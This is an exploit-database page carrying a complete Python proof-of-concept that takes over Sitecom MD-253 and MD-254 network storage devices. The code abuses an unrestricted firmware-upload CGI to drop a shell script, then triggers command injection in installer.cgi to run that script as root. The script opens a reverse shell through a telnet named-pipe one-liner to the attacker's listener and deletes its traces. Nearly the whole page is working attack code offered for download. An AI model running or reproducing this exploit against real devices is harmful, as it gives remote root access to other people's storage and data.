0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sitecom MD-25x Multiple Vulnerabilities Reverse Root Shell Exploit
[#!/usr/bin/python
#
# Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit
# Date: 09/11/12
# Exploit Author: Mattijs van Ommeren (mattijs _ at _ alcyon _ dot _nl)
# Vendor Homepage: http://www.sitecom.com
# Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin
# Version: 2.4.17 and below
# Tested on: Windows 7 x64 and Backtrack 5 R1
# CVE : N/A
#
# This PoC exploit code demonstrates how several bugs in Sitecom MD-253 and MD-254 Network Storage
# devices can be combined to obtain a root shell.
#
# Firmware versions up to and including 2.4.17 are affected by the following vulnerabilities:
#
# 1. The /cgi-bin/upload CGI used by the firmware update function allows arbitrary file uploads that are:
# - granted execute permissions
# - not removed after uploading if they don't contain valid firmware
# - stored in a predictable location
# 2. Installer.cgi contains a command injection vulnerability that allows one to run arbitrary commands as
# root (only a limited character set can be used due to URL-encoding by CGI-handler)
#
# Known Limitations:
# - Crude heuristics to determine whether a pseudo prompt needs to be echoed to stderr
#
# Vulnerability Details:
# - http://www.alcyon.nl/advisories/aa-007
# - http://www.alcyon.nl/advisories/aa-008
#
# Latest version of this exploit:
# - http://www.alcyon.nl/blog/sitecom-poc-exploit
#
import sys
import os
import socket
import thread
import datetime
from optparse import OptionParser
upload_url = '/cgi-bin/upload'
cmd_inj_url = '/cgi-bin/installer.cgi?SetExecTable&%s'
sh_name = 'revsh'
sh_script = """
#!/bin/sh
mknod /tmp/backpipe p
telnet %s %s 0</tmp/backpipe | /bin/sh -C 1>/tmp/backpipe 2>/tmp/backpipe
# clean up our mess
rm -f /tmp/backpipe
rm -f /tmp/%s
""".rstrip('\r')
headers = """Host: %s\r
User-Agent: Mozilla/5.0 (PwNAS 1.0; rv:1.0)\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r
Accept-Language: en-us,en;q=0.5\r
Proxy-Connection: close\r
Referer: http://%s/firmware.htm\r
Cookie: language=en;\r\n"""
class Exploit:
def stdin_thread(self, sock):
try:
fd = sys.stdin.fileno()
while True:
data = os.read(fd, 1024)
if not data:
break
while True:
nleft = len(data)
nleft -= sock.send(data)
if nleft == 0:
break
except:
pass
sock.close()
self.running = False
def stdout_thread(self, sock):
last = datetime.datetime.now()
try:
fd = sys.stdout.fileno()
while True:
if (datetime.datetime.now()-last<datetime.timedelta(milliseconds=500)):
sys.stderr.write('# '); # Insert fake prompt
last = datetime.datetime.now()
data = sock.recv(1024)
if not data:
break
while True:
nleft = len(data)
nleft -= os.write(fd, data)
if nleft == 0:
break
except Exception as e:
print e
pass
sock.close()
self.running = False
def parse_options(self):
parser = OptionParser(usage="usage: %prog [options]")
parser.add_option("-r", "--remote-host", action="store", type="string", dest="hostname",
help="Specify the host to connect to")
parser.add_option("-l", "--listener-address", action="store", type="string", dest="listener_ip",
help="Target IP for reverse shell connection")
parser.add_option("-p","--port",action="store",type="int",dest="port",
help="TCP port for the reverse shell connection")
parser.set_defaults(hostname=None, listener_ip=None, port=7777)
(options, args) = parser.parse_args();
if(options.hostname == None):
sys.stdout.write("Remote hostname/IP required\n")
parser.print_help()
sys.exit()
#self.forced_bind = (options.listener_ip != None)
self.listener_ip = options.listener_ip
self.hostname = options.hostname
self.port = options.port
def start_local_listener(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
self.serv.setsockopt(socket.SOL_SOCKET, socket.TCP_NODELAY, 1)
except socket.error:
sys.stderr.write("[-] Unable to set TCP_NODELAY")
try:
self.serv.bind((self.listener_ip, self.port))
except:
print "[-] Unable to bind to given IP-address. Attempting to bind on default address. You probably need a #NAT/PAT rule if you're behind a firewall."
try:
self.serv.bind(('', self.port))
except:
print "[-] Unable to bind to default address. Aborting."
sys.exit(2)
print "[*] Listener started on %s:%s" % (self.serv.getsockname()[0], self.port)
self.serv.listen(5)
self.clientsock, addr = self.serv.accept()
print "[*] Incoming connection from %s:%s" % (self.clientsock.getsockname()[0], self.clientsock.getsockname()[1])
self.clientsock.send('/bin/busybox uname -a\n');
banner = self.clientsock.recv(2048)
if (banner.find('Linux'))>=0:
print "[*] W00t W00t, got shell!\n\n%s\n" % banner
thread.start_new_thread(self.stdin_thread, (self.clientsock,))
thread.start_new_thread(self.stdout_thread, (self.clientsock,))
def connect_socket(self):
print "[*] Connecting..."
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect( (self.hostname, 80) )
if not self.listener_ip:
self.listener_ip = self.socket.getsockname()[0]
print "[*] Connected to %s (%s) " % (self.hostname, self.socket.getpeername()[0])
except Exception as inst:
print inst
print "[-] Unable to connect"
sys.exit(2)
def upload_payload(self):
print "[*] Uploading payload\n"
try:
self.socket.send('POST %s HTTP/1.1\n' % upload_url)
self.send_headers()
ct = 'Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n'
begin_file='-----------------------------41184676334\r\n\
Content-Disposition: form-data; name="file"; filename="%s"\r\n\
Content-Type: application/octet-stream\r\n\r'
end_file='\r\n-----------------------------41184676334--\r\n'
pl = ''.join([begin_file, sh_script, end_file]) % (sh_name, self.listener_ip, self.port, sh_name)
cl = 'Content-Length: %s\r\n\r\n' % (len(pl))
crlf = '\r\n'
data = ''.join([ct,cl,pl,crlf])
self.socket.send(data)
if self.socket.recv(2048).find("200 OK")>=0 and self.socket.recv(2048).find('/tmp/'+sh_name)>=0:
print "[*] Payload succesfully uploaded"
self.socket.close()
else:
print "[-] Unexpected response. Trying to proceed anyway."
except:
print "[-] Error uploading payload. Aborting."
sys.exit(2)
def send_headers(self):
data = headers %(self.hostname, self.hostname)
self.socket.send(data)
def execute_payload(self):
print "[*] Executing payload"
cmd = '/tmp/' + sh_name
req = 'GET %s HTTP/1.1\r\n' % (cmd_inj_url % cmd)
cr = '\r\n'
self.socket.send(''.join([req,cr]))
self.send_headers()
if self.socket.recv(2048).find("200 OK")>=0:
print "[*] Finished executing payload"
self.socket.close()
def run(self):
self.line_buf = ''
self.prompt = False
self.parse_options()
self.connect_socket()
thread.start_new_thread(self.start_local_listener, ())
self.upload_payload()
self.connect_socket()
self.execute_payload()
print "[*] Waiting for reverse shell connection"
self.running = True
while self.running:
pass
exploit = Exploit()
exploit.run()
# 0day.today [2025-01-07] #